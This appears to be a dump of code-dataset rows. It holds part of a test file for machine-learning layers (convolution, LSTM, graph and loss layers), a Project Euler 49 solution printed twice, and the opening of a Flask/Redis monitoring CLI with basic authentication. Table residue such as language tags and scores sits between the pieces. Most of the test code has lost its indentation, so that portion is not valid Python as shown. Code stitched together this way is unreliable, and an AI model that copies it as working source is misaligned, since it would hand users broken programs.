assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_flatten(self):
"""Test invoking Flatten in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Flatten()(input)
assert result.shape == (5, 40)
def test_reshape(self):
"""Test invoking Reshape in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Reshape((100, 2))(input)
assert result.shape == (100, 2)
def test_cast(self):
"""Test invoking Cast in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 3)
result = layers.Cast(dtype=tf.float32)(input)
assert result.dtype == tf.float32
def test_squeeze(self):
"""Test invoking Squeeze in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 1, 4).astype(np.float32)
result = layers.Squeeze()(input)
assert result.shape == (5, 4)
def test_transpose(self):
"""Test invoking Transpose in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Transpose((1, 2, 0))(input)
assert result.shape == (10, 4, 5)
def test_combine_mean_std(self):
"""Test invoking CombineMeanStd in eager mode."""
with context.eager_mode():
mean = np.random.rand(5, 3).astype(np.float32)
std = np.random.rand(5, 3).astype(np.float32)
layer = layers.CombineMeanStd(training_only=True, noise_epsilon=0.01)
result1 = layer(mean, std, training=False)
assert np.array_equal(result1, mean) # No noise in test mode
result2 = layer(mean, std, training=True)
assert not np.array_equal(result2, mean)
assert np.allclose(result2, mean, atol=0.1)
def test_repeat(self):
"""Test invoking Repeat in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 4).astype(np.float32)
result = layers.Repeat(3)(input)
assert result.shape == (5, 3, 4)
assert np.array_equal(result[:, 0, :], result[:, 1, :])
def test_gather(self):
"""Test invoking Gather in eager mode."""
with context.eager_mode():
input = np.random.rand(5).astype(np.float32)
indices = [[1], [3]]
result = layers.Gather()(input, indices)
assert np.array_equal(result, [input[1], input[3]])
def test_gru(self):
"""Test invoking GRU in eager mode."""
with context.eager_mode():
batch_size = 10
n_hidden = 7
in_channels = 4
n_steps = 6
input = np.random.rand(batch_size, n_steps,
in_channels).astype(np.float32)
layer = layers.GRU(n_hidden, batch_size)
result, state = layer(input)
assert result.shape == (batch_size, n_steps, n_hidden)
assert len(layer.trainable_variables) == 3
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.GRU(n_hidden, batch_size)
result2, state2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3, state3 = layer(input)
assert np.allclose(result, result3)
# But if we specify a different starting state, that should produce a
# different result.
result4, state4 = layer(input, initial_state=state3)
assert not np.allclose(result, result4)
def test_lstm(self):
"""Test invoking LSTM in eager mode."""
with context.eager_mode():
batch_size = 10
n_hidden = 7
in_channels = 4
n_steps = 6
input = np.random.rand(batch_size, n_steps,
in_channels).astype(np.float32)
layer = layers.LSTM(n_hidden, batch_size)
result, state = layer(input)
assert result.shape == (batch_size, n_steps, n_hidden)
assert len(layer.trainable_variables) == 3
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.LSTM(n_hidden, batch_size)
result2, state2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3, state3 = layer(input)
assert np.allclose(result, result3)
# But if we specify a different starting state, that should produce a
# different result.
result4, state4 = layer(input, initial_state=state3)
assert not np.allclose(result, result4)
def test_time_series_dense(self):
"""Test invoking TimeSeriesDense in eager mode."""
with context.eager_mode():
in_dim = 2
out_dim = 3
n_steps = 6
batch_size = 10
input = np.random.rand(batch_size, n_steps, in_dim).astype(np.float32)
layer = layers.TimeSeriesDense(out_dim)
result = layer(input)
assert result.shape == (batch_size, n_steps, out_dim)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.TimeSeriesDense(out_dim)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_l1_loss(self):
"""Test invoking L1Loss in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.L1Loss()(input1, input2)
expected = np.mean(np.abs(input1 - input2), axis=1)
assert np.allclose(result, expected)
def test_l2_loss(self):
"""Test invoking L2Loss in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.L2Loss()(input1, input2)
expected = np.mean((input1 - input2)**2, axis=1)
assert np.allclose(result, expected)
def test_softmax(self):
"""Test invoking SoftMax in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.SoftMax()(input)
expected = tf.nn.softmax(input)
assert np.allclose(result, expected)
def test_sigmoid(self):
"""Test invoking Sigmoid in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.Sigmoid()(input)
expected = tf.nn.sigmoid(input)
assert np.allclose(result, expected)
def test_relu(self):
"""Test invoking ReLU in eager mode."""
with context.eager_mode():
input = np.random.normal(size=(5, 10)).astype(np.float32)
result = layers.ReLU()(input)
expected = tf.nn.relu(input)
assert np.allclose(result, expected)
def test_concat(self):
"""Test invoking Concat in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 4).astype(np.float32)
result = layers.Concat()(input1, input2)
assert result.shape == (5, 14)
assert np.array_equal(input1, result[:, :10])
assert np.array_equal(input2, result[:, 10:])
def test_stack(self):
"""Test invoking Stack in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 4).astype(np.float32)
input2 = np.random.rand(5, 4).astype(np.float32)
result = layers.Stack()(input1, input2)
assert result.shape == (5, 2, 4)
assert np.array_equal(input1, result[:, 0, :])
assert np.array_equal(input2, result[:, 1, :])
def test_constant(self):
"""Test invoking Constant in eager mode."""
with context.eager_mode():
value = np.random.rand(5, 4).astype(np.float32)
result = layers.Constant(value)()
assert np.array_equal(result, value)
def test_variable(self):
"""Test invoking Variable in eager mode."""
with context.eager_mode():
value = np.random.rand(5, 4).astype(np.float32)
layer = layers.Variable(value)
result = layer()
assert np.array_equal(result.numpy(), value)
assert len(layer.trainable_variables) == 1
def test_add(self):
"""Test invoking Add in eager mode."""
with context.eager_mode():
result = layers.Add()([1, 2], [3, 4])
assert np.array_equal(result, [4, 6])
def test_multiply(self):
"""Test invoking Multiply in eager mode."""
with context.eager_mode():
result = layers.Multiply()([1, 2], [3, 4])
assert np.array_equal(result, [3, 8])
def test_divide(self):
"""Test invoking Divide in eager mode."""
with context.eager_mode():
result = layers.Divide()([1, 2], [2, 5])
assert np.allclose(result, [0.5, 0.4])
def test_log(self):
"""Test invoking Log in eager mode."""
with context.eager_mode():
result = layers.Log()(2.5)
assert np.allclose(result, np.log(2.5))
def test_exp(self):
"""Test invoking Exp in eager mode."""
with context.eager_mode():
result = layers.Exp()(2.5)
assert np.allclose(result, np.exp(2.5))
def test_interatomic_l2_distances(self):
"""Test invoking InteratomicL2Distances in eager mode."""
with context.eager_mode():
atoms = 5
neighbors = 2
coords = np.random.rand(atoms, 3)
neighbor_list = np.random.randint(0, atoms, size=(atoms, neighbors))
layer = layers.InteratomicL2Distances(atoms, neighbors, 3)
result = layer(coords, neighbor_list)
assert result.shape == (atoms, neighbors)
for atom in range(atoms):
for neighbor in range(neighbors):
delta = coords[atom] - coords[neighbor_list[atom, neighbor]]
dist2 = np.dot(delta, delta)
assert np.allclose(dist2, result[atom, neighbor])
def test_sparse_softmax_cross_entropy(self):
"""Test invoking SparseSoftMaxCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.rand(batch_size).astype(np.int32)
result = layers.SparseSoftMaxCrossEntropy()(labels, logits)
expected = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_softmax_cross_entropy(self):
"""Test invoking SoftMaxCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.rand(batch_size, n_features).astype(np.float32)
result = layers.SoftMaxCrossEntropy()(labels, logits)
expected = tf.nn.softmax_cross_entropy_with_logits_v2(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_sigmoid_cross_entropy(self):
"""Test invoking SigmoidCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.randint(0, 2,
(batch_size, n_features)).astype(np.float32)
result = layers.SigmoidCrossEntropy()(labels, logits)
expected = tf.nn.sigmoid_cross_entropy_with_logits(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_reduce_mean(self):
"""Test invoking ReduceMean in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceMean(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.mean(input, axis=1))
def test_reduce_max(self):
"""Test invoking ReduceMax in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceMax(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.max(input, axis=1))
def test_reduce_sum(self):
"""Test invoking ReduceSum in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceSum(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.sum(input, axis=1))
def test_reduce_square_difference(self):
"""Test invoking ReduceSquareDifference in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceSquareDifference(axis=1)(input1, input2)
assert result.shape == (5,)
assert np.allclose(result, np.mean((input1 - input2)**2, axis=1))
def test_conv_2d(self):
"""Test invoking Conv2D in eager mode."""
with context.eager_mode():
length = 4
width = 5
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, length, width,
in_channels).astype(np.float32)
layer = layers.Conv2D(filters, kernel_size=kernel_size)
result = layer(input)
assert result.shape == (batch_size, length, width, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv2D(filters, kernel_size=kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_3d(self):
"""Test invoking Conv3D in eager mode."""
with context.eager_mode():
length = 4
width = 5
depth = 6
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, length, width, depth,
in_channels).astype(np.float32)
layer = layers.Conv3D(filters, kernel_size=kernel_size)
result = layer(input)
assert result.shape == (batch_size, length, width, depth, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv3D(filters, kernel_size=kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_2d_transpose(self):
"""Test invoking Conv2DTranspose in eager mode."""
with context.eager_mode():
length = 4
width = 5
in_channels = 2
filters = 3
kernel_size = 2
stride = 2
batch_size = 10
input = np.random.rand(batch_size, length, width,
in_channels).astype(np.float32)
layer = layers.Conv2DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result = layer(input)
assert result.shape == (batch_size, length * stride, width * stride,
filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv2DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_3d_transpose(self):
"""Test invoking Conv3DTranspose in eager mode."""
with context.eager_mode():
length = 4
width = 5
depth = 6
in_channels = 2
filters = 3
kernel_size = 2
stride = 2
batch_size = 10
input = np.random.rand(batch_size, length, width, depth,
in_channels).astype(np.float32)
layer = layers.Conv3DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result = layer(input)
assert result.shape == (batch_size, length * stride, width * stride,
depth * stride, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv3DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_max_pool_1d(self):
"""Test invoking MaxPool1D in eager mode."""
with context.eager_mode():
input = np.random.rand(4, 6, 8).astype(np.float32)
result = layers.MaxPool1D(strides=2)(input)
assert result.shape == (4, 3, 8)
def test_max_pool_2d(self):
"""Test invoking MaxPool2D in eager mode."""
with context.eager_mode():
input = np.random.rand(2, 4, 6, 8).astype(np.float32)
result = layers.MaxPool2D()(input)
assert result.shape == (2, 2, 3, 8)
def test_max_pool_3d(self):
"""Test invoking MaxPool3D in eager mode."""
with context.eager_mode():
input = np.random.rand(2, 4, 6, 8, 2).astype(np.float32)
result = layers.MaxPool3D()(input)
assert result.shape == (2, 2, 3, 4, 2)
def test_graph_conv(self):
"""Test invoking GraphConv in eager mode."""
with context.eager_mode():
out_channels = 2
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
layer = layers.GraphConv(out_channels)
result = layer(*args)
assert result.shape == (n_atoms, out_channels)
assert len(layer.trainable_variables) == 2 * layer.num_deg
def test_graph_pool(self):
"""Test invoking GraphPool in eager mode."""
with context.eager_mode():
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
result = layers.GraphPool()(*args)
assert result.shape[0] == n_atoms
# TODO What should shape[1] be? It's not documented.
def test_graph_gather(self):
"""Test invoking GraphGather in eager mode."""
with context.eager_mode():
batch_size = 2
n_features = 75
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
result = layers.GraphGather(batch_size)(*args)
# TODO(rbharath): Why is it 2*n_features instead of n_features?
assert result.shape == (batch_size, 2 * n_features)
def test_lstm_step(self):
    """Test invoking LSTMStep in eager mode.

    LSTMStep takes a (n_test, 2*n_feat) input together with the previous
    hidden and cell states and returns a nested result unpacked below as
    (h, (h_copy, c)); all three pieces are (n_test, n_feat).
    """
    with context.eager_mode():
        # Fixed: removed unused local `max_depth` (copy-paste residue from
        # the embedding tests below, which do use it).
        n_test = 5
        n_feat = 10
        y = np.random.rand(n_test, 2 * n_feat).astype(np.float32)
        state_zero = np.random.rand(n_test, n_feat).astype(np.float32)
        state_one = np.random.rand(n_test, n_feat).astype(np.float32)
        layer = layers.LSTMStep(n_feat, 2 * n_feat)
        result = layer(y, state_zero, state_one)
        h_out, h_copy_out, c_out = (result[0], result[1][0], result[1][1])
        assert h_out.shape == (n_test, n_feat)
        assert h_copy_out.shape == (n_test, n_feat)
        assert c_out.shape == (n_test, n_feat)
        assert len(layer.trainable_variables) == 3
def test_attn_lstm_embedding(self):
"""Test invoking AttnLSTMEmbedding in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_support = 11
n_feat = 10
test = np.random.rand(n_test, n_feat).astype(np.float32)
support = np.random.rand(n_support, n_feat).astype(np.float32)
layer = layers.AttnLSTMEmbedding(n_test, n_support, n_feat, max_depth)
test_out, support_out = layer(test, support)
assert test_out.shape == (n_test, n_feat)
assert support_out.shape == (n_support, n_feat)
assert len(layer.trainable_variables) == 7
def test_iter_ref_lstm_embedding(self):
    """Test invoking IterRefLSTMEmbedding in eager mode."""
    # Fixed: the docstring previously said "AttnLSTMEmbedding", copy-pasted
    # from the test above; this test exercises IterRefLSTMEmbedding.
    with context.eager_mode():
        max_depth = 5
        n_test = 5
        n_support = 11
        n_feat = 10
        test = np.random.rand(n_test, n_feat).astype(np.float32)
        support = np.random.rand(n_support, n_feat).astype(np.float32)
        layer = layers.IterRefLSTMEmbedding(n_test, n_support, n_feat, max_depth)
        # The layer refines both test and support embeddings, preserving shapes.
        test_out, support_out = layer(test, support)
        assert test_out.shape == (n_test, n_feat)
        assert support_out.shape == (n_support, n_feat)
        assert len(layer.trainable_variables) == 12
def test_batch_norm(self):
"""Test invoking BatchNorm in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
input = np.random.rand(batch_size, n_features).astype(np.float32)
layer = layers.BatchNorm()
result = layer(input)
assert result.shape == (batch_size, n_features)
assert len(layer.trainable_variables) == 2
def test_weighted_error(self):
"""Test invoking WeightedError in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.WeightedError()(input1, input2)
expected = np.sum(input1 * input2)
assert np.allclose(result, expected)
def test_vina_free_energy(self):
"""Test invoking VinaFreeEnergy in eager mode."""
with context.eager_mode():
n_atoms = 5
m_nbrs = 1
ndim = 3
nbr_cutoff = 1
start = 0
stop = 4
X = np.random.rand(n_atoms, ndim).astype(np.float32)
Z = np.random.randint(0, 2, (n_atoms)).astype(np.float32)
layer = layers.VinaFreeEnergy(n_atoms, m_nbrs, ndim, nbr_cutoff, start,
stop)
result = layer(X, Z)
assert len(layer.trainable_variables) == 6
assert result.shape == tuple()
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.VinaFreeEnergy(n_atoms, m_nbrs, ndim, nbr_cutoff, start,
stop)
result2 = layer2(X, Z)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(X, Z)
assert np.allclose(result, result3)
def test_weighted_linear_combo(self):
"""Test invoking WeightedLinearCombo in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
layer = layers.WeightedLinearCombo()
result = layer(input1, input2)
assert len(layer.trainable_variables) == 2
expected = input1 * layer.trainable_variables[0] + input2 * layer.trainable_variables[1]
assert np.allclose(result, expected)
def test_neighbor_list(self):
"""Test invoking NeighborList in eager mode."""
with context.eager_mode():
N_atoms = 5
start = 0
stop = 12
nbr_cutoff = 3
ndim = 3
M_nbrs = 2
coords = start + np.random.rand(N_atoms, ndim) * (stop - start)
coords = tf.cast(tf.stack(coords), tf.float32)
layer = layers.NeighborList(N_atoms, M_nbrs, ndim, nbr_cutoff, start,
stop)
result = layer(coords)
assert result.shape == (N_atoms, M_nbrs)
def test_dropout(self):
"""Test invoking Dropout in eager mode."""
with context.eager_mode():
rate = 0.5
input = np.random.rand(5, 10).astype(np.float32)
layer = layers.Dropout(rate)
result1 = layer(input, training=False)
assert np.allclose(result1, input)
result2 = layer(input, training=True)
assert not np.allclose(result2, input)
nonzero = result2.numpy() != 0
assert np.allclose(result2.numpy()[nonzero], input[nonzero] / rate)
def test_atomic_convolution(self):
"""Test invoking AtomicConvolution in eager mode."""
with context.eager_mode():
batch_size = 4
max_atoms = 5
max_neighbors = 2
dimensions = 3
params = [[5.0, 2.0, 0.5], [10.0, 2.0, 0.5]]
input1 = np.random.rand(batch_size, max_atoms,
dimensions).astype(np.float32)
input2 = np.random.randint(
max_atoms, size=(batch_size, max_atoms, max_neighbors))
input3 = np.random.randint(
1, 10, size=(batch_size, max_atoms, max_neighbors))
layer = layers.AtomicConvolution(radial_params=params)
result = layer(input1, input2, input3)
assert result.shape == (batch_size, max_atoms, len(params))
assert len(layer.trainable_variables) == 3
def test_alpha_share_layer(self):
"""Test invoking AlphaShareLayer in eager mode."""
with context.eager_mode():
batch_size = 10
length = 6
input1 = np.random.rand(batch_size, length).astype(np.float32)
input2 = np.random.rand(batch_size, length).astype(np.float32)
layer = layers.AlphaShareLayer()
result = layer(input1, input2)
assert input1.shape == result[0].shape
assert input2.shape == result[1].shape
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.AlphaShareLayer()
result2 = layer2(input1, input2)
assert not np.allclose(result[0], result2[0])
assert not np.allclose(result[1], result2[1])
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input1, input2)
assert np.allclose(result[0], result3[0])
assert np.allclose(result[1], result3[1])
def test_sluice_loss(self):
"""Test invoking SluiceLoss in eager mode."""
with context.eager_mode():
input1 = np.ones((3, 4)).astype(np.float32)
input2 = np.ones((2, 2)).astype(np.float32)
result = layers.SluiceLoss()(input1, input2)
assert np.allclose(result, 40.0)
def test_beta_share(self):
"""Test invoking BetaShare in eager mode."""
with context.eager_mode():
batch_size = 10
length = 6
input1 = np.random.rand(batch_size, length).astype(np.float32)
input2 = np.random.rand(batch_size, length).astype(np.float32)
layer = layers.BetaShare()
result = layer(input1, input2)
assert input1.shape == result.shape
assert input2.shape == result.shape
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.BetaShare()
result2 = layer2(input1, input2)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input1, input2)
assert np.allclose(result, result3)
def test_ani_feat(self):
"""Test invoking ANIFeat in eager mode."""
with context.eager_mode():
batch_size = 10
max_atoms = 5
input = np.random.rand(batch_size, max_atoms, 4).astype(np.float32)
layer = layers.ANIFeat(max_atoms=max_atoms)
result = layer(input)
# TODO What should the output shape be? It's not documented, and there
# are no other test cases for it.
def test_graph_embed_pool_layer(self):
    """GraphEmbedPoolLayer: pooled shapes, layer-specific weights, determinism."""
    with context.eager_mode():
        vertices = np.random.uniform(size=(10, 100, 50)).astype(np.float32)
        adj = np.random.uniform(size=(10, 100, 5, 100)).astype(np.float32)
        pool = layers.GraphEmbedPoolLayer(num_vertices=6)
        outputs = pool(vertices, adj)
        # 100 vertices are pooled down to 6; feature width is preserved.
        assert outputs[0].shape == (10, 6, 50)
        assert outputs[1].shape == (10, 6, 5, 6)
        # A second layer carries different random weights, so both outputs
        # must change.
        other = layers.GraphEmbedPoolLayer(num_vertices=6)(vertices, adj)
        assert not np.allclose(outputs[0], other[0])
        assert not np.allclose(outputs[1], other[1])
        # The first layer, evaluated again, reproduces its earlier result.
        again = pool(vertices, adj)
        assert np.allclose(outputs[0], again[0])
        assert np.allclose(outputs[1], again[1])
def test_graph_cnn(self):
    """GraphCNN: output shape, layer-specific weights, determinism."""
    with context.eager_mode():
        verts = np.random.uniform(size=(10, 100, 50)).astype(np.float32)
        adj = np.random.uniform(size=(10, 100, 5, 100)).astype(np.float32)
        conv = layers.GraphCNN(num_filters=6)
        out = conv(verts, adj)
        # One 6-channel feature vector per vertex.
        assert out.shape == (10, 100, 6)
        # A freshly built layer has different random weights.
        assert not np.allclose(out, layers.GraphCNN(num_filters=6)(verts, adj))
        # Applying the same layer twice yields identical results.
        assert np.allclose(out, conv(verts, adj))
def test_hinge_loss(self):
    """HingeLoss returns one loss value per label."""
    with context.eager_mode():
        n_labels = 1
        n_logits = 1
        # Keep the original creation order (logits first) so the global
        # RNG is consumed identically.
        logits = np.random.rand(n_logits).astype(np.float32)
        labels = np.random.rand(n_labels).astype(np.float32)
        loss = layers.HingeLoss()(labels, logits)
        assert loss.shape == (n_labels,)
| pt | 0.199146 | 2.679691 | 3 |
py/py_0049_prime_permutations.py | lcsm29/project-euler | 0 | 13598 | # Solution of;
# Project Euler Problem 49: Prime permutations
# https://projecteuler.net/problem=49
#
# The arithmetic sequence, 1487, 4817, 8147, in which each of the terms
# increases by 3330, is unusual in two ways: (i) each of the three terms are
# prime, and, (ii) each of the 4-digit numbers are permutations of one
# another. There are no arithmetic sequences made up of three 1-, 2-, or
# 3-digit primes, exhibiting this property, but there is one other 4-digit
# increasing sequence. What 12-digit number do you form by concatenating the
# three terms in this sequence?
#
# by lcsm29 http://github.com/lcsm29/project-euler
import timed
def dummy(n):
    """Solve Project Euler 49 and return the 12-digit concatenation.

    Searches the 4-digit primes for three terms in arithmetic progression
    that are digit-permutations of one another, skipping the sequence
    1487, 4817, 8147 given in the problem statement.

    Args:
        n: unused; kept so ``timed.caller(dummy, n, ...)`` keeps working.

    Returns:
        int: the concatenation of the three terms (296962999629), or
        ``None`` if no sequence is found.
    """
    limit = 10000
    # Sieve of Eratosthenes over all 4-digit candidates.
    is_prime = [True] * limit
    is_prime[0] = is_prime[1] = False
    for p in range(2, int(limit ** 0.5) + 1):
        if is_prime[p]:
            for multiple in range(p * p, limit, p):
                is_prime[multiple] = False
    # Group 4-digit primes by digit signature; permutations share a group.
    groups = {}
    for p in range(1000, limit):
        if is_prime[p]:
            groups.setdefault(''.join(sorted(str(p))), []).append(p)
    for primes in groups.values():
        members = set(primes)
        for i, a in enumerate(primes):
            if a == 1487:  # skip the sequence given in the problem statement
                continue
            for b in primes[i + 1:]:
                c = 2 * b - a  # third term of the arithmetic progression
                if c in members:
                    return int('%d%d%d' % (a, b, c))
    return None
if __name__ == '__main__':
    # Drive the solver through the shared timing harness.
    n = 1000       # size argument forwarded to dummy()
    i = 10000      # presumably the number of timed repetitions -- see timed.caller
    prob_id = 49   # Project Euler problem number, used for reporting
    timed.caller(dummy, n, i, prob_id)
| # Solution of;
# Project Euler Problem 49: Prime permutations
# https://projecteuler.net/problem=49
#
# The arithmetic sequence, 1487, 4817, 8147, in which each of the terms
# increases by 3330, is unusual in two ways: (i) each of the three terms are
# prime, and, (ii) each of the 4-digit numbers are permutations of one
# another. There are no arithmetic sequences made up of three 1-, 2-, or
# 3-digit primes, exhibiting this property, but there is one other 4-digit
# increasing sequence. What 12-digit number do you form by concatenating the
# three terms in this sequence?
#
# by lcsm29 http://github.com/lcsm29/project-euler
import timed
def dummy(n):
    """Solve Project Euler 49 and return the 12-digit concatenation.

    Searches the 4-digit primes for three terms in arithmetic progression
    that are digit-permutations of one another, skipping the sequence
    1487, 4817, 8147 given in the problem statement.

    Args:
        n: unused; kept so ``timed.caller(dummy, n, ...)`` keeps working.

    Returns:
        int: the concatenation of the three terms (296962999629), or
        ``None`` if no sequence is found.
    """
    limit = 10000
    # Sieve of Eratosthenes over all 4-digit candidates.
    is_prime = [True] * limit
    is_prime[0] = is_prime[1] = False
    for p in range(2, int(limit ** 0.5) + 1):
        if is_prime[p]:
            for multiple in range(p * p, limit, p):
                is_prime[multiple] = False
    # Group 4-digit primes by digit signature; permutations share a group.
    groups = {}
    for p in range(1000, limit):
        if is_prime[p]:
            groups.setdefault(''.join(sorted(str(p))), []).append(p)
    for primes in groups.values():
        members = set(primes)
        for i, a in enumerate(primes):
            if a == 1487:  # skip the sequence given in the problem statement
                continue
            for b in primes[i + 1:]:
                c = 2 * b - a  # third term of the arithmetic progression
                if c in members:
                    return int('%d%d%d' % (a, b, c))
    return None
if __name__ == '__main__':
    # Drive the solver through the shared timing harness.
    n = 1000       # size argument forwarded to dummy()
    i = 10000      # presumably the number of timed repetitions -- see timed.caller
    prob_id = 49   # Project Euler problem number, used for reporting
    timed.caller(dummy, n, i, prob_id)
| it | 0.138422 | 2.965898 | 3 |
rqmonitor/cli.py | trodery/rqmonitor | 0 | 13599 | <gh_stars>0
"""
This reference script has been taken from rq-dashboard with some modifications
"""
import importlib
import logging
import os
import sys
from urllib.parse import quote as urlquote, urlunparse
from redis.connection import (URL_QUERY_ARGUMENT_PARSERS,
UnixDomainSocketConnection,
SSLConnection)
from urllib.parse import urlparse, parse_qs, unquote
import click
from flask import Flask, Response, request
from rqmonitor.defaults import RQ_MONITOR_REDIS_URL, RQ_MONITOR_REFRESH_INTERVAL
from rqmonitor.version import VERSION
from rqmonitor.bp import monitor_blueprint
logger = logging.getLogger("werkzeug")
def add_basic_auth(blueprint, username, password, realm="RQ Monitor"):
    """Protect every request on *blueprint* with HTTP Basic Auth.

    Note this is only for casual use!
    """
    @blueprint.before_request
    def _check_credentials(*args, **kwargs):
        credentials = request.authorization
        authorized = (
            credentials is not None
            and credentials.username == username
            and credentials.password == password
        )
        if not authorized:
            # Ask the browser to prompt for credentials for this realm.
            challenge = {"WWW-Authenticate": 'Basic realm="{}"'.format(realm)}
            return Response("Please login", 401, challenge)
def create_app_with_blueprint(config=None, username=None, password=None,
                              url_prefix='', blueprint=monitor_blueprint):
    """Return Flask app with default configuration and registered blueprint.

    Args:
        config: dotted path of a Python module whose settings override the
            Flask defaults.
        username: HTTP Basic Auth user; auth is only enabled when set.
